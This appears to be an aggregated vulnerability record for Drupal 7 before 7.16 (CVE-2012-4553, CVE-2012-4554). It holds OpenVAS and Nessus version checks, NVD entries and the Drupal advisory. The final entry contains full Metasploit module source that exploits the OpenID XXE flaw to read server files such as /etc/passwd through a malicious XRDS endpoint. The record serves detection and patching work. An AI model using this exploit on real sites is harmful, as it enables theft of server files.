ID OPENVAS:72617 Type openvas Reporter Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com Modified 2017-04-21T00:00:00
Description
The remote host is missing an update to the system
as announced in the referenced advisory.
#
#VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
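# Human-readable text attached to the result. The insight now names the
# affected version range and both CVEs, and the solution names the first
# fixed release (7.16, the same threshold the version check below uses)
# plus the interim mitigation from the Drupal advisory, so a reader does
# not have to follow the links to learn what to do.
tag_insight = "The following package is affected: drupal7

Drupal 7.x before 7.16 (FreeBSD port drupal7) is affected by two issues:
CVE-2012-4553 - under transient conditions the installer can be re-run
against an external database server, which can lead to arbitrary PHP code
execution on the original server; and CVE-2012-4554 - the OpenID module
reads arbitrary local files via a crafted DOCTYPE declaration in an XRDS
document served by a malicious OpenID server.";
tag_solution = "Update your system with the appropriate patches or
software upgrades. Upgrade the drupal7 port to 7.16 or later.
If the upgrade cannot be deployed immediately, removing or blocking access
to install.php mitigates the code-execution issue (CVE-2012-4553) only.

http://drupal.org/node/1815912
http://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html";
tag_summary = "The remote host is missing an update to the system
as announced in the referenced advisory.";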
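if(description)
{
  script_id(72617);
  script_version("$Revision: 5999 $");
  # CVE-2012-4553: installer re-run via an external database (PHP code execution)
  # CVE-2012-4554: OpenID module, crafted DOCTYPE in an XRDS document (local file read)
  script_cve_id("CVE-2012-4553", "CVE-2012-4554");
  script_tag(name:"last_modification", value:"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $");
  script_tag(name:"creation_date", value:"2012-11-26 12:47:33 -0500 (Mon, 26 Nov 2012)");
  # Score is that of the higher-rated issue (CVE-2012-4553, 6.8); CVE-2012-4554 alone is 5.0.
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_name("FreeBSD Ports: drupal7");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com");
  script_family("FreeBSD Local Security Checks");
  # The check only reads the package list gathered over SSH from a FreeBSD host.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/freebsdrel", "login/SSH/success");

  script_tag(name:"insight", value:tag_insight);
  script_tag(name:"solution", value:tag_solution);
  script_tag(name:"summary", value:tag_summary);

  # Advisory links as structured cross-references so reporting tools can
  # surface them directly instead of only as free text inside the solution.
  script_xref(name:"URL", value:"http://drupal.org/node/1815912");
  script_xref(name:"URL", value:"http://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html");

  # The verdict is derived from the installed package version only.
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");
  exit(0);
}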
#
# The script code starts here
#
include("pkg-lib-bsd.inc");
# Compare the installed drupal7 port against the first fixed release (7.16).
# This is a package-version check: it does not confirm that the OpenID
# module is enabled (CVE-2012-4554) or that install.php is reachable
# (CVE-2012-4553), so a host may be reported even when those conditions
# do not hold; see the Drupal advisory for the details.
report = "";
affected = FALSE;

installed = portver(pkg:"drupal7");
if(!isnull(installed)) {
  # revcomp() < 0 means the installed version sorts before 7.16.
  if(revcomp(a:installed, b:"7.16") < 0) {
    report += "Package drupal7 version " + installed + " is installed which is known to be vulnerable.\n";
    affected = TRUE;
  }
}

if(affected) {
  security_message(data:report);
} else if(__pkg_match) {
  # Package present but not in the affected range
  # (99 is presumably the "not vulnerable" result code here - confirm against pkg-lib-bsd.inc).
  exit(99);
}
{"href": "http://plugins.openvas.org/nasl.php?oid=72617", "history": [], "naslFamily": "FreeBSD Local Security Checks", "id": "OPENVAS:72617", "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-11-26T00:00:00", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "title": "FreeBSD Ports: drupal7", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "#\n#VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: drupal7\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://drupal.org/node/1815912\nhttp://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(72617);\n script_version(\"$Revision: 5999 $\");\n script_cve_id(\"CVE-2012-4553\", \"CVE-2012-4554\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 12:47:33 -0500 (Mon, 26 Nov 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: drupal7\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\ntxt = \"\";\nbver = portver(pkg:\"drupal7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.16\")<0) {\n txt += \"Package drupal7 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt ));\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "pluginID": "72617", "hash": "9c1b370606b0ccbcf82af1f33a128b09885e96c54e2047d61df1701054e733f0", "references": [], "edition": 1, "cvelist": ["CVE-2012-4553", "CVE-2012-4554"], "lastseen": "2017-07-02T21:10:30", "viewCount": 4, "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2017-07-02T21:10:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4553", "CVE-2012-4554"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231072617"]}, {"type": "nessus", "idList": ["DRUPAL_7_16.NASL"]}, {"type": "drupal", "idList": ["DRUPAL-SA-CORE-2012-003"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/DRUPAL_OPENID_XXE"]}], "modified": "2017-07-02T21:10:30"}, "vulnersScore": 5.5}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "4e85633231989ab1dcb881a8100d542f"}, {"key": "cvss", "hash": "737e2591b537c46d1ca7ce6f0cea5cb9"}, {"key": "description", "hash": 
"b61b488598bc075b85e0c3d5f67ea70d"}, {"key": "href", "hash": "69ce1e951d4a6a1b0b61ca8f2da39616"}, {"key": "modified", "hash": "ac79630d1390466794385c2ba9d795e4"}, {"key": "naslFamily", "hash": "fe45aa727b58c1249bf04cfb7b4e6ae0"}, {"key": "pluginID", "hash": "05418f309486bdb413ee03c328b1c053"}, {"key": "published", "hash": "594208dc69a797a068f0b8b8688d938c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e34e2f978e4314ac3276e0e621a2704e"}, {"key": "sourceData", "hash": "544f4e3c710cdb9ac7ed4ae2aa93e8fa"}, {"key": "title", "hash": "820f496a98cd10f4744b1e83e472c356"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-04-21T00:00:00"}
{"cve": [{"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "Drupal 7.x before 7.16 allows remote attackers to obtain sensitive information and possibly re-install Drupal and execute arbitrary PHP code via an external database server, related to \"transient conditions.\"", "modified": "2012-11-12T21:56:00", "id": "CVE-2012-4553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4553", "published": "2012-11-11T13:00:00", "title": "CVE-2012-4553", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:12:25", "bulletinFamily": "NVD", "description": "The OpenID module in Drupal 7.x before 7.16 allows remote OpenID servers to read arbitrary files via a crafted DOCTYPE declaration in an XRDS file.", "modified": "2012-11-12T22:00:00", "id": "CVE-2012-4554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4554", "published": "2012-11-11T13:00:00", "title": "CVE-2012-4554", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:38:40", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-11-26T00:00:00", "id": "OPENVAS:136141256231072617", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231072617", "title": "FreeBSD Ports: drupal7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_drupal70.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.72617\");\n script_version(\"$Revision: 11762 $\");\n script_cve_id(\"CVE-2012-4553\", \"CVE-2012-4554\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 12:47:33 -0500 (Mon, 26 Nov 2012)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: drupal7\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://drupal.org/node/1815912\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/2adc3e78-22d1-11e2-b9f0-d0df9acfd7e5.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"drupal7\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.16\")<0) {\n txt += \"Package drupal7 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T02:26:11", "bulletinFamily": "scanner", "description": "The remote web server is running a version of Drupal that is 7.x prior\nto 7.16. 
It is, therefore, potentially affected by multiple\nvulnerabilities :\n\n - An arbitrary PHP code execution vulnerability exists due\n to an error in the ", "modified": "2019-11-02T00:00:00", "id": "DRUPAL_7_16.NASL", "href": "https://www.tenable.com/plugins/nessus/62678", "published": "2012-10-24T00:00:00", "title": "Drupal 7.x < 7.16 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62678);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2012-4553\", \"CVE-2012-4554\");\n script_bugtraq_id(56103);\n\n script_name(english:\"Drupal 7.x < 7.16 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of Drupal that is 7.x prior\nto 7.16. It is, therefore, potentially affected by multiple\nvulnerabilities :\n\n - An arbitrary PHP code execution vulnerability exists due\n to an error in the 'installer.php' script. An attacker,\n under certain conditions, could use this to re-install\n Drupal via an external database server, which then could\n allow the execution of arbitrary PHP code on the\n original server. This vulnerability is mitigated by the\n fact that the re-installation can only be successful if\n the site's 'settings.php' file or directories are\n writeable by, or owned by, the web server user.\n (CVE-2012-4553)\n\n - An information disclosure vulnerability exists for sites\n using the OpenID module. 
This could allow an attacker to\n read files on the local system by attempting to log into\n the site using a malicious OpenID server.\n (CVE-2012-4554)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/node/1815912\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 7.16 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/24\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Drupal\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n 
exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\nloc = build_url(qs:dir, port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# 7.x < 7.16 are affected\nif (version =~ \"^7\\.([0-9]|1[0-5])($|[^0-9]+)\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + loc +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 7.16' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, loc, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "drupal": [{"lastseen": "2019-05-31T19:28:10", "bulletinFamily": "software", "description": "Multiple vulnerabilities were discovered in Drupal core.\n\n### Arbitrary PHP code execution\n\nA bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server.\n\nThis vulnerability is mitigated by the fact that the re-installation can only be successful if the site's settings.php file or sites directories are writeable by or owned by the webserver user. Configuring the Drupal installation to be owned by a different user than the webserver user (and not to be writeable by the webserver user) is a [recommended security best practice](<http://drupal.org/node/244924>). 
However, in all cases the transient conditions expose information to an attacker who accesses install.php, and therefore this security update should be applied to all Drupal 7 sites.\n\nCVE: CVE-2012-4553\n\n### Information disclosure - OpenID module\n\nFor sites using the core OpenID module, an information disclosure vulnerability was identified that allows an attacker to read files on the local filesystem by attempting to log in to the site using a malicious OpenID server.\n\nCVE: CVE-2012-4554\n\n## Versions affected\n\n * Drupal core 7.x versions prior to 7.16.\n\nDrupal 6 is not affected.\n\n## Solution\n\nInstall the latest version:\n\n * If you use Drupal 7.x, upgrade to [Drupal core 7.16](<http://drupal.org/node/1815904>).\n\nIf you are unable to deploy the security release immediately, removing or blocking access to install.php is a sufficient mitigation step for the arbitrary PHP code execution vulnerability.\n\nAlso see the [Drupal core](<http://drupal.org/project/drupal>) project page.\n\n## Reported by\n\n * The arbitrary PHP code execution vulnerability was reported by [Heine Deelstra](<http://drupal.org/user/17943>) and [Noam Rathaus](<http://drupal.org/user/2317662>) working with Beyond Security's SecuriTeam Secure Disclosure Program. 
Heine Deelstra is also a member of the Drupal Security Team.\n * The information disclosure vulnerability in the OpenID module was reported by [Reginaldo Silva](<http://drupal.org/user/2305626>).\n\n## Fixed by\n\n * The arbitrary PHP code execution vulnerability was fixed by [Damien Tournoud](<http://drupal.org/user/22211>), [David Rothstein](<http://drupal.org/user/124982>), [Peter Wolanin](<http://drupal.org/user/49851>), and [K\u00e1roly N\u00e9gyesi](<http://drupal.org/user/9446>), all members of the Drupal Security Team.\n * The information disclosure vulnerability in the OpenID module was fixed by [Reginaldo Silva](<http://drupal.org/user/2305626>), [Christian Schmidt](<http://drupal.org/user/216078>), [Vojt\u011bch Kus\u00fd](<http://drupal.org/user/56154>), and [Fr\u00e9d\u00e9ric Marand](<http://drupal.org/user/27985>), and by [Peter Wolanin](<http://drupal.org/user/49851>), [David Rothstein](<http://drupal.org/user/124982>), [Damien Tournoud](<http://drupal.org/user/22211>), and [Heine Deelstra](<http://drupal.org/user/17943>) of the Drupal Security Team.\n", "modified": "2012-10-17T00:00:00", "published": "2012-10-17T00:00:00", "id": "DRUPAL-SA-CORE-2012-003", "href": "https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2012-10-17/sa-core-2012-003-drupal-core", "type": "drupal", "title": "SA-CORE-2012-003 - Drupal core - Arbitrary PHP code execution and Information disclosure\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-11-27T02:51:35", "bulletinFamily": "exploit", "description": "This module abuses an XML External Entity Injection vulnerability on the OpenID module from Drupal. The vulnerability exists in the parsing of a malformed XRDS file coming from a malicious OpenID endpoint. 
This module has been tested successfully on Drupal 7.15 and 7.2 with the OpenID module enabled.\n", "modified": "2017-07-24T13:26:21", "published": "2014-01-24T00:04:31", "id": "MSF:AUXILIARY/GATHER/DRUPAL_OPENID_XXE", "href": "", "type": "metasploit", "title": "Drupal OpenID External Entity Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer::HTML\n include REXML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal OpenID External Entity Injection',\n 'Description' => %q{\n This module abuses an XML External Entity Injection\n vulnerability on the OpenID module from Drupal. The vulnerability exists\n in the parsing of a malformed XRDS file coming from a malicious OpenID\n endpoint. This module has been tested successfully on Drupal 7.15 and\n 7.2 with the OpenID module enabled.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Reginaldo Silva', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4554' ],\n [ 'OSVDB', '86429' ],\n [ 'BID', '56103' ],\n [ 'URL', 'https://drupal.org/node/1815912' ],\n [ 'URL', 'http://drupalcode.org/project/drupal.git/commit/b912710' ],\n [ 'URL', 'http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]\n ],\n 'DisclosureDate' => 'Oct 17 2012'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base Drupal directory path\", '/drupal']),\n OptString.new('FILEPATH', [true, \"The filepath to read on the server\", \"/etc/passwd\"])\n ])\n\n end\n\n def xrds_file\n element_entity = <<-EOF\n<!ELEMENT URI ANY>\n<!ENTITY xxe SYSTEM \"file://#{datastore['FILEPATH']}\">\n EOF\n\n xml = Document.new\n\n xml.add(DocType.new('foo', \"[ #{element_entity} ]\"))\n\n xml.add_element(\n 
\"xrds:XRDS\",\n {\n 'xmlns:xrds' => \"xri://$xrds\",\n 'xmlns' => \"xri://$xrd*($v*2.0)\",\n 'xmlns:openid' => \"http://openid.net/xmlns/1.0\",\n })\n\n xrd = xml.root.add_element(\"XRD\")\n\n xrd.add_element(\n \"Status\",\n {\n \"cid\" => \"verified\"\n }\n )\n provider = xrd.add_element(\"ProviderID\")\n provider.text = \"xri://@\"\n\n canonical = xrd.add_element(\"CanonicalID\")\n canonical.text = \"http://example.com/user\"\n\n service = xrd.add_element(\"Service\")\n\n type_one = service.add_element(\"Type\")\n type_one.text = \"http://specs.openid.net/auth/2.0/signon\"\n\n type_two = service.add_element(\"Type\")\n type_two.text = \"http://openid.net/srv/ax/1.0\"\n\n uri = service.add_element(\"URI\")\n uri.text = \"METASPLOIT\"\n\n local_id = service.add_element(\"LocalID\")\n local_id.text = \"http://example.com/xrds\"\n\n return xml.to_s.gsub(/METASPLOIT/, \"#{get_uri}/#{@prefix}/&xxe;/#{@suffix}\") # To avoid html encoding\n end\n\n def check\n signature = Rex::Text.rand_text_alpha(5 + rand(5))\n res = send_openid_auth(signature)\n\n unless res\n vprint_status(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n if drupal_with_openid?(res, signature)\n return Exploit::CheckCode::Detected\n end\n\n if generated_with_drupal?(res)\n return Exploit::CheckCode::Safe\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def run\n @prefix = Rex::Text.rand_text_alpha(4 + rand(4))\n @suffix = Rex::Text.rand_text_alpha(4 + rand(4))\n exploit\n end\n\n def primer\n res = send_openid_auth(get_uri)\n\n if res.nil?\n # nothing to do here...\n service.stop\n return\n end\n\n unless res.code == 500\n print_warning(\"Unexpected answer, trying to parse anyway...\")\n end\n\n error_loot = parse_loot(res.body)\n\n # Check if file was retrieved on the drupal answer\n # Better results, because there isn't URL encoding,\n # plus probably allows to retrieve longer files.\n print_status(\"Searching loot on the Drupal answer...\")\n unless 
loot?(error_loot)\n # Check if file was leaked to the fake OpenID endpoint\n # Contents are probably URL encoded, plus probably long\n # files aren't full, but something is something :-)\n print_status(\"Searching loot on HTTP query...\")\n loot?(@http_loot)\n end\n\n # stop the service so the auxiliary module ends\n service.stop\n end\n\n\n def on_request_uri(cli, request)\n if request.uri =~ /#{@prefix}/\n vprint_status(\"Signature found, parsing file...\")\n @http_loot = parse_loot(request.uri)\n return\n end\n\n print_status(\"Sending XRDS...\")\n send_response_html(cli, xrds_file, { 'Content-Type' => 'application/xrds+xml' })\n end\n\n def send_openid_auth(identifier)\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.to_s, \"/\"),\n 'method' => 'POST',\n 'vars_get' => {\n \"q\" => \"node\",\n \"destination\" => \"node\"\n },\n 'vars_post' => {\n \"openid_identifier\" => identifier,\n \"name\" => \"\",\n \"pass\" => \"\",\n \"form_id\" => \"user_login_block\",\n \"op\" => \"Log in\"\n }\n })\n\n return res\n end\n\n def store(data)\n path = store_loot(\"drupal.file\", \"text/plain\", rhost, data, datastore['FILEPATH'])\n print_good(\"File found and saved to path: #{path}\")\n end\n\n def parse_loot(data)\n return nil if data.blank?\n\n # Full file found\n if data =~ /#{@prefix}\\/(.*)\\/#{@suffix}/m\n return $1\n end\n\n # Partial file found\n if data =~ /#{@prefix}\\/(.*)/m\n return $1\n end\n\n return nil\n end\n\n def loot?(data)\n return false if data.blank?\n store(data)\n return true\n end\n\n def drupal_with_openid?(http_response, signature)\n return false if http_response.blank?\n return false unless http_response.code == 200\n return false unless http_response.body =~ /openid_identifier.*#{signature}/\n return true\n end\n\n def generated_with_drupal?(http_response)\n return false if http_response.blank?\n return true if http_response.headers['X-Generator'] and http_response.headers['X-Generator'] =~ /Drupal/\n return true if 
http_response.body and http_response.body.to_s =~ /meta.*Generator.*Drupal/\n return false\n end\n\n\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/drupal_openid_xxe.rb"}]}